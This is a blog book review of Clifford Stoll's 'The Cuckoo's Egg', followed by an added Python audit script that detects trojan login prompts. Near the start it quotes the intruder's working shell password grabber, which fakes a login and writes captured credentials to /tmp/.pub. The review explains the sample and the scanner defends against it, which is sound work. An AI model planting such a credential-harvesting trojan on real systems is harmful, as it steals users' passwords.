Friday, September 30, 2011

Book Review: THE CUCKOO'S EGG by Clifford Stoll

It's the Reagan administration and although your government research job is unrelated to desktop and network maintenance, you've had several such duties deposited into your lap, which became several more. Now you're responsible for solving a summation problem in the accounting program that charges other departments for using time on your system (remember the earliest incarnations of 'time sharing'?). The issue is that a bit of time has been used and no one has paid for it. Digging into the relevant sessions, you notice an account that's been used recently, but was set up for someone who departed for another job two years ago. Questioning that person and others around him or her clears the original owner of suspicion. You begin attempting to find out how the current user of that account figured out how to use it - and from where...

Clifford Stoll's classic story of involvement in serious espionage messes begins in this massively plausible way. It was recommended to me by an NT-era MCSE; I proceeded to enjoy the book in spite of myself. But although I'd heard from various (inaccurate) sources that it involved "viruses", I was at least a little surprised to read the following lines early in the story:

echo -n "WELCOME TO THE LBL UNIX-4 COMPUTER"
echo -n "PLEASE LOG IN NOW"
echo -n "LOGIN:"
read account_name
echo -n "ENTER YOUR PASSWORD:"
(stty -echo; \
read password; \
stty echo;\
echo "";\
echo $account_name $password >> /tmp/.pub)
echo "SORRY, TRY AGAIN."

This is neither random vandalism nor a program attempting to replicate itself onto adjacent machines. Somewhat obviously, it's a password grabber: it turns off terminal echo, reads the password, appends the account name and password to a hidden file in /tmp, prints a fake "SORRY, TRY AGAIN." and then lets the user go on to the real login program, so the victim sees nothing worse than an apparent typo. It's a purpose-built program to harvest logins for the sneak thief who has arrogated control of an old account to himself, herself or itself. It was placed there by whoever broke and entered.
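As an added example, not from the book or from this review: the shape of that grabber (terminal echo switched off, a variable read from the keyboard, and that same variable later redirected into a file) is distinctive enough that a defender can audit login-path shell scripts for it. The small Python audit below flags that pattern, treats a dotfile under /tmp as an aggravating sign, and deliberately does not flag a script that merely reads a passphrase with echo off and passes it to a command. The sample scripts are constructed test inputs (the first is the one quoted above); the function name is my own.

```python
import re

# Constructed sample 1: the trojan login prompt quoted in the review.
TROJAN_LOGIN = r'''echo -n "WELCOME TO THE LBL UNIX-4 COMPUTER"
echo -n "PLEASE LOG IN NOW"
echo -n "LOGIN:"
read account_name
echo -n "ENTER YOUR PASSWORD:"
(stty -echo; \
read password; \
stty echo;\
echo "";\
echo $account_name $password >> /tmp/.pub)
echo "SORRY, TRY AGAIN."
'''

# Constructed sample 2: a benign prompt that also disables echo to read a
# secret, but hands it to a program instead of writing it to a file.
BENIGN_PROMPT = r'''echo -n "Passphrase for backup key: "
stty -echo
read passphrase
stty echo
echo
gpg --batch --passphrase "$passphrase" --symmetric archive.tar
'''

ECHO_OFF_RE = re.compile(r'\bstty\s+-echo\b')
ECHO_ON_RE = re.compile(r'\bstty\s+echo\b')
# `read` with optional flags (e.g. bash's -s, which also silences input).
READ_RE = re.compile(r'\bread\s+((?:-[a-z]+\s+)*)([A-Za-z_]\w*)')
# A redirect target; `&1`-style fd duplication is excluded on purpose.
REDIRECT_RE = re.compile(r'>>?\s*([^\s&|;)]+)')


def find_password_grabbers(script_text):
    """Scan shell source for a value typed with echo disabled that is later
    redirected into a file. Returns one finding dict per (variable, line)."""
    findings = []
    echo_off = False
    silent_vars = set()
    for lineno, line in enumerate(script_text.splitlines(), 1):
        if ECHO_OFF_RE.search(line):
            echo_off = True
        m = READ_RE.search(line)
        if m and (echo_off or '-s' in m.group(1).split()):
            silent_vars.add(m.group(2))
        if ECHO_ON_RE.search(line):
            echo_off = False
        r = REDIRECT_RE.search(line)
        if not r:
            continue
        target = r.group(1)
        for var in sorted(silent_vars):
            if re.search(r'\$\{' + var + r'\}|\$' + var + r'\b', line):
                findings.append({
                    'line': lineno,
                    'variable': var,
                    'target': target,
                    # A dotfile in a world-writable scratch directory is a
                    # classic place to stash harvested credentials.
                    'hidden_target': target.startswith('/tmp/.'),
                })
    return findings


if __name__ == '__main__':
    for name, text in (('trojan', TROJAN_LOGIN), ('benign', BENIGN_PROMPT)):
        print(name, find_password_grabbers(text))
```

The check is intentionally syntactic: it knows nothing about what the script is for, only that a secret entered blind ended up in a file. In practice you would run it over the profile and login scripts on the interactive path, which is exactly where the book's intruder planted his copy.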

Stoll made the commendable decision not to interfere with the sneak, but to observe the sneak's actions over time. Time revealed that although root was attained, backdoors were installed and files were read, not much time was spent actually reading the files. The sneak proceeded over the LAN to other computers and did the same. The sneak wasn't so much interested in the data (though he did download it) as in the network - the connections over which he could travel to other destinations. And they weren't just unclassified science projects like Stoll's astronomy research post; they mostly included sensitive stuff. Stoll began consulting with the three-letter agencies and the plot thickened.

What follows is not only a story of network research in the days before the consumer internet (which is not a terribly large part of the story) but a common litany of woes regarding having to deal not only with spooks that aren't at liberty to say whether you're full of baloney or not, but with layers and layers of middle management that have no power to say 'yes', but plenty to say 'no'. Without giving much away, I'll say that Stoll laboriously traces the sneak out of the building, out of the organization, away from the West coast to New Jersey, over the transatlantic cable and, modem by modem (that's Modulator/DeModulator, junior) into a situation that begins to address diplomatic issues among countries both allied to us and... perhaps not.

There would be many morals here. The first one that occurs to me is not to let responsibility creep get you thrown into prison, let alone rooked out of a fair paycheck. Five stars out of four.